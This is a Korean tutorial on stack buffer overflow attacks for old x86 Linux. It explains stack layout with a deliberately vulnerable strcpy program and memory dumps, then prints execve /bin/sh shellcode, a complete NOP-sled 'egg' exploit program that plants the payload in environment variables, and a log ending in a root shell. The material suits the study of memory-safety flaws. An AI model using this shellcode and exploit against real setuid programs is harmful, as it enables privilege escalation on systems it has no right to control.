======================================================================= 
                       버퍼 오버 플로우 : 해킹 관련 내용 

               작성 : 원광대 bugbox?추은석/이종웅 
               메일 : litdemon@hanmail.net/jwstyle@hitel.net 
======================================================================= 
       이 문서는 누구나 사용하고 배포할수 있음을 확인 합니다. 
       또한 본문은 한국 배포판 엑셀 리눅스 6.1 버전에서 테스트 했을 때 
       오버플로우를 확인 했습니다. 
        
       intel CPU 사용 
       kernel : 2.2.13 
       gcc 버전 : gcc-2.95.1 
        
1.버퍼 오버플로어란? 
버퍼 오버플로우 공격이란 말은 보안에 관심이 많은 사람들이라면 누구나 한번쯤 
은 들어본 말일 것이다. 버퍼오버플로우 공격이란 말 그대로 지정된 버퍼의 크 
기보다 많은 데이타를 입력해서 프로그램이 비정상적으로 동작하도록 만드는 것이다. 
(리턴 어드레스를 바꿈으로서 원하는 기계어를 실행시켜 suid상태에 있는 프로그램이 
shell 코드를 실행시킨다) 
이 방법은 Aleph One이 Phrack 49-14에 공개 함으로서 세상에 나오게 되었다. 
그리고 Aleph One의 글과 여기의 내용이 다르게 스택의 크기가 2배정도 크게 잡힌다. 
그 이유는 CPU의 차이에서 오므로 크게 염려할 필요는 없을 듯하다. 


2.메모리 구조 

버퍼 오버 플로우 공격을 이해하려면 우선 메모리 구조와 스택의 구조에 대해 서 알아 
야 한다. 메모리와 스택의 구조는 OS에 따라서 다르고 또 CPU에 따라서 다르다.다음에 
설명할 OS환경은 인텔(intel) x86계열 CPU를 사용하는 리눅스(엑셀 리눅스 6.1)를 기 
본으로 하고 설명 하겠다. 

이 내용은 /usr/src/linux/fs/binfmt_elf.c 의 내용을 참조했다. 그 파일에는 어떻게 
elf형식의 바이너리가 메모리에 로드 되는지에 대한 코드가 들어있고, 
다음의 홈페이지에 문서를 참조한다.(http://linuxdev.net/journal/1999/07/003.html) 

       --------------- 0x08048000 
       | Text 부 : 프로그램의 코드가 위치 
       |-------------- 
       | Data 부 : 정적 변수(static vaiable)가 저장 되어 있다 
       |-------------- 
       | free    : 
       |                  : 
       |--------------  ESP 
       | Stack   : 동적으로 할당되는 데이터, 함수내의 변수, 함수의 리턴 
       |                어드레스 등이 저장되는 영역이다. 
       |-------------- 
       | agrc, argv : 아규먼트 변수들이 위치한다. stact과 구분 되지는 않지만.. 
       |------------- 
       | environment : UNIX(linux)의 환경 변수가 위치한다. 
       |-------------- 
       | etc           : 그외의 널과 프로그램 실해 코드가 위치한다. 
       |------------- 0xbfffffff 

프로그램의 시작 메모리 번지는 0x08048000이다.(가상 메모리를 사용하므로 모든 
프로세스는 0x08048000에서 시작한다.)   여기서 부터 실행될수 있는 파일 
의 코드 부분이 로드된다. ( 프로그램을 런타임에 메모리를 덤프해서 파일과 비교 
해 보기를 바란다. 백문이 불여 일견) text와 Data부는 읽기만 가능한 메모리 영 
역이기 때문에 데이타를 쓰려고 시도하면 segmentation violation을 일으킨다. 
고로 우리의 관심은 그곳에 가질 필요가 없다. 신경 끄기 바란다. 
        
우리의 관심사는 stack 영역의 밑부분 주소이다. 텍스트 영역을 읽으면서 프로그 
램이 실행되는데 함수를 부를 때 함수의 실행이 끝나고 돌아올 리턴 어드레스를 
스택에 저정한다. 그리고 함수의 실행이 끝나면 리턴 어드레스를 참조해 그곳에 
있는 프로그램 코드를 실행한다. 우리는 리턴 되는 곳을 바꿀 것이다. 물론 리턴 
되는 곳은 우리가 원하는 프로그램이 위치하는 건 당연한 것이고.. 

   코드로 들어 가기 전에 몇가지 더 알아야 할 사항을 나열한다. 
       1. 스택의 탑은 레지스터 ESP에서 관리 되는데 
               unsigned long get_esp(){ 
                   __asm__("movl %esp, %eax"); 
               } 
       위와 같은 간단한 코딩으로 얻어 낼수 있다. eax에 값을 넣고 끝내면 
       eax레지스터 값이 리턴 값이 된다. 
                
       2. environment 부는 환경 변수의 값들을 모두 메모리에 로드한다. 
       버퍼가 너무 작아 싫행할 코드를 버퍼 안에만 넣을수가 없을 때 환경 변수 
       에 넣는 것 만으로 공격 대상 프로그램이 실행 됐을때 같이 로드 되게 할수 
       있다. 

3. 스택의 구조 

================================================================= 
아래는 공격 대상 프로그램이다. 분석을 위해 메모리 덤프하는 코드를 
넣었고 스택 구조를 설명하기 위해 함수 호출을 했다. 
================================================================= 
#include <stdio.h> 
int main(int argc, char *argv[]){ 
        
} 

#include <string.h> 
#include "dumpcode.h" 
unsigned long get_esp(){ 
   __asm__("movl %esp, %eax"); 
       } 
void function(char buffer[]){ 
       char ch[16]="################";       // 위치 확인을 위해... 
       char buff[20]="))))))))))))))))))))"; 
       unsigned long sp; 
       sp=get_esp();                // 스택의 top 번지를 얻어 낸다. 
       sp-=(unsigned long)(sp%16); // 프린트를 위한 코드 
       strcpy(buff,buffer);         // 공격 대상 함수. 
       dumpcode((char *)sp,0xbfffffff-sp);     //top에서 스택의 바닥까지 덤프출력 
       printf("이런 제길 %s \n",buffer); 
} 
int main(int argc, char *argv[]){ 
       char a='A'; 
       int d=11; 
       int e=10; 
       function(argv[1]); 
       return 1; 
} 
============출력 결과=============================================== 
[litdemon@mos Hacking]$ ./over 12                               
0xbffff8a0  a0 f8 ff bf 5f 07 00 00 e8 f8 ff bf 79 89 04 08   ...._.......y... 
0xbffff8b0  70 2e 01 40 f3 59 0e 40 17 f9 ff bf 20 00 00 00   p..@.Y.@.... ... 
0xbffff8c0  a0 f8 ff bf 31 32 00 29 29 29 29 29 29 29 29 29   ....12.))))))))) 
0xbffff8d0  29 29 29 29 29 29 29 29 23 23 23 23 23 23 23 23   ))))))))######## 
0xbffff8e0  23 23 23 23 23 23 23 23 18 f9 ff bf fd 89 04 08   ########........ 
0xbffff8f0  9a fa ff bf cd 03 00 00 27 a0 02 40 4c 9a 04 08   ........'..@L... 
0xbffff900  0c b0 04 08 70 2e 01 40 f3 59 0e 40 0a 00 00 00   ....p..@.Y.@.... 
0xbffff910  0b 00 00 00 0c b0 04 41 98 43 0f 40 c2 46 03 40   .......A.C.@.F.@ 
0xbffff920  02 00 00 00 64 f9 ff bf 70 f9 ff bf 84 28 01 40   ....d...p....(.@ 
0xbffff930  02 00 00 00 90 86 04 08 00 00 00 00 b1 86 04 08   ................ 
0xbffff940  d4 89 04 08 02 00 00 00 64 f9 ff bf a8 85 04 08   ........d....... 
0xbffff950  54 9c 04 08 44 a0 00 40 5c f9 ff bf d0 2e 01 40   T...D..@\......@ 

[litdemon@mos Hacking]$ ./over 123456789012345678901234567890123   
0xbffff880  80 f8 ff bf 7f 07 00 00 c8 f8 ff bf 79 89 04 08   ............y... 
0xbffff890  70 2e 01 40 f3 59 0e 40 f7 f8 ff bf 20 00 00 00   p..@.Y.@.... ... 
0xbffff8a0  80 f8 ff bf 31 32 33 34 35 36 37 38 39 30 31 32   ....123456789012 
0xbffff8b0  33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38   3456789012345678 
0xbffff8c0  39 30 31 32 33 00 23 23 f8 f8 ff bf fd 89 04 08   90123.##........ 
0xbffff8d0  7b fa ff bf cd 03 00 00 27 a0 02 40 4c 9a 04 08   {.......'..@L... 
0xbffff8e0  0c b0 04 08 70 2e 01 40 f3 59 0e 40 0a 00 00 00   ....p..@.Y.@.... 
0xbffff8f0  0b 00 00 00 0c b0 04 41 98 43 0f 40 c2 46 03 40   .......A.C.@.F.@ 

위의 출력 결과들은 밑으로 환경 변수와 다른 잡다한 정보들이 있지만 생략한다. 
두번에 걸처 실행한 출력 결과이다. 번지수가 서로 다른 이유는 입력된 값이 다르기 
때문이다. 주위깊게 봐야 할 부분은 입력된 값들이 있는 위치이다. 

우선 위의 출력 결과를 보고 변수들이 어떻게 위치하고 있는지 분석해 보자. 
=================================================================== 
변수들의 값 
function : 0xbffff8c0 ~ 0xbffff8c3 : sp         
        : 0xbffff8c4 ~ 0xbffff8d7 : buff[20] :: buffer의 문자열을 복사한 값 
        : 0xbffff8d8 ~ 0xbffff8e7 : ch[16] 
        : 0xbffff8e8 ~ 0xbffff8eb : 프라임 포인터 
        : 0xbffff8ec ~ 0xbffff8ef : 리턴 어드레스 
main         : 0xbffff8f0 ~ 0xbffff8f3 : argv[1] 
        : 0xbffff910 ~ 0xbffff913 : d 
        : 0xbffff90c ~ 0xbffff90f : e 
        
위이 출력 결과의 경우 ch[16]의 값을 볼수 있는 반면에 밑의 출력 결과의 경우 끝에 
두문자 ( 90123.##........) 많이 남겨지고 모두 덮어 쓰여 졌다. 
물론 필자가 세그먼트 에러는 안나게 하기 위해 리턴 어드레스 있는 곳까지는 덮어 
쓰지 않을 정도 까지의 값을 넣기는 했다. 하지만 입력되는 값들을 원하는 위치의 
주소로 리턴 하는 어드레스로 덮어 쓸여 질때까지 입력 해 버린다면 어떻게 될까? 
^^ 맞다! 이것이 정령 오버 플로우이다. 

4. 공격 준비 

자~ 이제 어디를 고치면 리턴되는 곳을 바꿀수 있는가를 살펴 보았다. 
이제는 무엇을 해야 하느냐? 물론 리턴될 곳에 우리가 원하는 프로그램을 만들어 
위치 시켜야 한다. 알아야 할사항은 실행되고 있는 프로그램이 쓰는 메모리 영역에 
같이 들어 가야 Setuid의 퍼미션을 얻을 수 있다. 또한 다른 곳으로 리턴 어드 
레스를 옴길 수도 없다. 어떻게 넣어야 할까? 
두가지 방법이 있다. 
버퍼(위의 경우 복사되는 변수 buff[20])에 넣어 하는 방법이 있다 하지만 그럴경우 
buff의 시작 번지에서 리턴 어드레스가 있는 번지까지의 사이에 넣어야 하는데 
불가능하다. 또한 코드를 알고 있을때나 리턴 어드레스의 위치를 추측할수 있지만 
대부분의 경우 그렇지 못하다. 다른 방법을 모색해 보자 
또다른 방법은 환경 변수를 이용하는 것이다. 위에서 스택 구조를 보았듯이 프로 
그램이 실행 되면서 환경변수들을 모두 스택에 쌓는 것을 볼수 있다. 이를 이용하자 
환경변수에 shell을 얻을수 있는 코드를 넣으면 되는데 아래에 있다. 그러나 아래 
코드를 그냥 넣을 수 없다. 넣는다 해도 실행 되지 않는다. 

아래의 코드를 컴파일하고 disassamble해서 필요한 코드많은 얻어 낸다음 환경 
변수를 이용해 스택에 넣는다. 필자는 어셈블을 모르기 때문에 누가 만들어 놓은 
쉘 코드를 이용 하겠다. 
================= 
   쉘 코 드 
================= 

#include <stdio.h> 
void main(){ 
       char *name[2]; 
       name[0] = "/bin/sh" 
       name[1] = NULL; 
       execve(name[0], name, NULL); 
} 

위의 코드를 컴파일한 후 디스 어셈블해서 쉘을 실행시키는 코드를 추출해야 한다. 
자세한 내용은 다른 문서를 참조하기 바란다. 

       \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b 
       \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd 
       \x80\xe8\xdc\xff\xff\xff/bin/sh 
        
위는 코드는 위의 C코드를 컴파일 한다음 문자열로 사용해야 하기때문에 끝으로 
인식되는 0x00같은 문자열을 없에고 만들어 놓은 코드이다. 

아래 코드는 오버플로우를 하기 위한 준비를 하는 프로그램이다. 
환경변수에 리턴할 주소($RET)와 실행할 쉘 코드($EGG)에 넣어 bash쉘을 실행시켜 
놓으면 다음 프로그램(공격대상)이 실행 되면서 작업해 놓은 환경변수들을 로드 
한다. 


#include <stdlib.h> 
#include <stdlib.h> 
#include "dumpcode.h" 
#define DEFAULT_OFFSET                    0 
#define DEFAULT_BUFFER_SIZE             512 
#define DEFAULT_EGG_SIZE               2048 
#define NOP                            0x90 

char shellcode[] =              //실행에 쓰일 쉘코드. 
       "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
   "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 

unsigned long get_esp(void) { 
       __asm__("movl %esp,%eax");   //사용할 주소를 얻기 위해 
} 

int main(int argc, char *argv[]) { 
       unsigned long sp; 
       char *buff, *ptr, *egg; 
       long *addr_ptr, addr; 
       int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; 
       int i, eggsize=DEFAULT_EGG_SIZE; 

       if (argc > 1) bsize   = atoi(argv[1]);   
       if (argc > 2) offset  = atoi(argv[2]); 
       if (argc > 3) eggsize = atoi(argv[3]); 


       if (!(buff = malloc(bsize))) { 
               printf("Can't allocate memory.\n"); 
               exit(0); 
       } 
       if (!(egg = malloc(eggsize))) { 
               printf("Can't allocate memory.\n"); 
               exit(0); 
       } 
        
       addr = get_esp() - offset; 
       printf("Using address: 0x%x\n", addr); 

// 리턴할 주소를 오버 플로우 일어날 정도의 많은 양을 4바이트 단위로 
// 몽땅 만들어 놓는다. 
       ptr = buff; 
       addr_ptr = (long *) ptr; 
       for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; 
       ptr = egg; 
// NOP을 대량으로 넣어 리턴될 곳이 중간 어디에로나 위치해도 쉘 코드를 
// 실행 될수 있게 한다. (어셈블리 코드로 \0x90 (NOP)은 아무일도 하지 않는다.) 

       for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) 
               *(ptr++) = NOP; 
                
// NOP이 몽땅 들어가 있는 변수의 마지막에 쉘코드를 넣는다. 
       for (i = 0; i < strlen(shellcode); i++) 
               *(ptr++) = shellcode[i]; 

       buff[bsize - 1] = '\0'; 
       egg[eggsize - 1] = '\0'; 

       memcpy(egg,"EGG=",4); 
       putenv(egg);                //환경변수에 쉘 코드를 넣는다. 
       memcpy(buff,"RET=",4); 
       putenv(buff);                //리턴 주소를 넣는다. 
       system("/bin/bash"); 
       printf("\n"); 
} 


5. 공격 



[litdemon@mos litdemon]$ ./example 
Using address: 0xbffff8d8 
[litdemon@mos litdemon]$ export 
declare -x BASE_ENV="/home/litdemon/.bashrc" 
declare -x DISPLAY="happy.wonkwang.ac.kr:0.0" 
declare -x 
EGG="릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱F덯 
            ?  V 
                          됹뛐?1???汪???/bin/sh" 
declare -x 
GDK_FONTSET_GUESS="/home/litdemon/.fontmap:/usr/lib/gtk+/fontmap" 
declare -x HANGUL_KEYBOARD_TYPE="2" 
declare -x HISTFILESIZE="1000" 
declare -x HISTSIZE="1000" 
declare -x HOME="/home/litdemon" 
declare -x HOSTNAME="mos" 
declare -x HOSTTYPE="i386" 
declare -x INPUTRC="/etc/inputrc" 
declare -x KDEDIR="/usr/kde" 
declare -x LANG="ko_KR.eucKR" 
declare -x LC_ALL="ko_KR.eucKR" 
declare -x LESS="-MM" 
declare -x LESSCHARSET="latin1" 
declare -x LESSKEY="/etc/.less" 
declare -x LESSOPEN="|lesspipe.sh  %s" 
declare -x LINGUAS="ko_KR.eucKR" 
declare -x LOGNAME="litdemon" 
declare -x 
LS_COLORS="no=00:fi=00:di=01;33:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:ex=01;32:*~=05;31:*.mtxt=05;31:*.ndx=05;31:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.c=01;36:*.h=01;36:*.pl=01;36:*.pm=01;36:*.cgi=01;36:*.java=01;36:*.html=01;36:*.htm=01;36:*.php3=01;33:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.jpeg=01;35:*.JPG=01;35:*.gif=01;35:*.GIF=01;35:*.bmp=01;35:*.BMP=01;35:*.xbm=01;35:*.ppm=01;35:*.xpm=01;35:*.tif=01;35:*.mp3=01;35:*.mp2=01;35:*.mpeg=01;35:*.mpg=01;35:*.rpm=01;34:*.deb=01;33:*.bz2=01;33:*.patch=01;33:*.spec=01;34:*.diff=01;34:" 
declare -x MAIL="/var/spool/mail/litdemon" 
declare -x OSTYPE="Linux" 
declare -x 
PATH="/usr/kde/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/home/litdemon/bin" 
declare -x PERL_BADLANG="0" 
declare -x QTDIR="/usr/lib/qt-2.0.2" 
declare -x REMOTEHOST="happy.wonkwang.ac.kr" 
declare -x 
RET="眄?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?왠?" 
declare -x SHELL="/bin/bash" 
declare -x SHLVL="3" 
declare -x TERM="xterm-color" 
declare -x USER="litdemon" 
declare -x USERNAME="" 
[litdemon@mos litdemon]$ ./overflow asdfsdf 
이런 제길 asdfsdf 
[litdemon@mos litdemon]$ ./overflow $RET 
이런 제길 
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱F덯 
            ?  V 
                          됹뛐?1???汪???/bin/sh 
bash# 

공격을 다음과 같이 이루어 진다. 
example을 실행하면 환경변수 $RET와 $EGG에 이상한 값들이 들어 가 있는 것을 볼 
수 있고 [litdemon@mos litdemon]$ ./overflow asdfsdf 이부분은 이 프로그램이 
단순히 입력된값을 복사해서 프린트 하는 프로그램이란 걸 보여준것이다. 
overflow프로그램의 입력 값으로 $RET 환경 변수를 넣으면 오버 플로어.. 

6. 마무리 

  위의 example코드는 리턴 어드레스의 양, 쉘코드 앞에 삽입되는 NOP의 양, 리턴 
  되는 주소들을 변경하여 입력 될수 있도록 프로그램 된 것이다. 

  환경 변수의 양에 따라 쉘 코드의 위치가 자주 바뀌게 되는데 이를 추측 하기 
  힘들기 때문에 변경해서 넣을 수 있도록 프로그램 되어 있다. 

  꼭 분석해 보기 바란다.